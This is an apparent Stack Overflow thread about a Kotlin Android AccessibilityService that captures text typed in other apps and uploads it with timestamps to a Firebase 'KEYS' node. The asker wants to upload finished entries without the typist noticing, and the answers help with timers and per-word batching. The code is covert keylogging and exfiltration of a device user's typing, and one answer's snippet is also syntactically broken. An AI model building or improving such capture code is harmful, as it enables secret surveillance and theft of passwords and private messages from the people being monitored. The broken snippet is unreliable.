# send text data when user finishes typing instead of on text changed in kotlin android

Tags: android, firebase, kotlin, firebase-realtime-database, accessibilityservice

I want to send an text to firebase database when the user has finished typing (I use AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED). I don't want it to send text every time the user types a letter because that would result in A LOT of text data, however I don't want them to have to hit the enter button either.

Is there a way so I can detect when the user has finished typing and then send the text data?

Using Kotlin here! Thanks

I don't want to use button

```
@Inject lateinit var interactor: InteractorAccessibilityData

override fun onAccessibilityEvent(event: AccessibilityEvent) {

        when (event.eventType) {

            AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED -> {
                val data = event.text.toString()
                if (data != "[]") {
                    interactor.setDataKey("${getDateTime()} |(TEXT)| $data")
                    Log.i(TAG, "${getDateTime()} |(TEXT)| $data")

                }
            }
        }

}
```

In InteractorAccessibilityData.kt->

```
override fun setDataKey(data: String) {
        if (firebase.getUser()!=null) firebase.getDatabaseReference(KEYS).child(DATA).push().child(TEXT).setValue(data)
}
```

Comment: I don't think there is a thing that allows you to do this, although I'm not sure. You could maybe try sending the data to firebase when the textfield is no longer 'focused', or check if the user hasn't typed anything in for x amount of seconds and then send data

Comment: Start a timer when a change is detected. If a new change is within a certain threshold, then cancel the previous timer and restart it. If the timer runs out it should send the data to the database. Not sure if it's the most efficient way, but it is one way to do it.

Comment: @TomTruyen not able to do using a timer. is there any other way please tell me?

Comment: @Eric.1 also tried that not working. still sending data every time user types a letter. please help me with another way. I am sure there must be a way

Comment: I don't think there is another way, I have no clue how else the system/kotlin should know when a user stops typing, it's not an AI it's just a language. Your timer is probably also wrong because in theory it should work, but of course like @Eric.1 said, it's probably not the most efficient way to do it

Answer (score 0):

Using a Timer would be the best way.
Another way would be checking the length of the text.
say after an initial length of 10 sends data to firebase and after that every +2 or +3 length.

Introduce a variable outside this function which counts the timer.

```
// declare this outside onAccessibilityEvent function
    private val timer = object : CountDownTimer(50000, 1000) {
        override fun onTick(millisUntilFinished: Long) {
            //use it if you want to show the timer
        }

        override fun onFinish() {

        //send data to firebase, like
        //if (firebase.getUser()!=null) firebase.getDatabaseReference(KEYS).child(DATA).push().child(TEXT).setValue(data)
        }
    }

//function to start or cancel the timer
    private fun x(p: Int = 0) {
        when (p) {
            0 -> timer.start()
            1 -> timer.cancel()
        }
    }
```

This method doesn't look efficient but this is how I would do it if I have no other options.

Answer (score 0):

The Best you can do is send text after every word (by using spaces)
Like This

```
          @Inject lateinit var interactor: InteractorAccessibilityData

        override fun onAccessibilityEvent(event: AccessibilityEvent) {

    when (event.eventType) {

        AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED -> {
            val data = event.text.toString()
            if (data.contain( )) {
                interactor.setDataKey("${getDateTime()} |(TEXT)| $data")
                Log.i(TAG, "${getDateTime()} |(TEXT)| $data")

            }
        }
    }
```

}

Comment: unfortunately, the OP avoid using button click listener in this case, maybe you wants to update your answer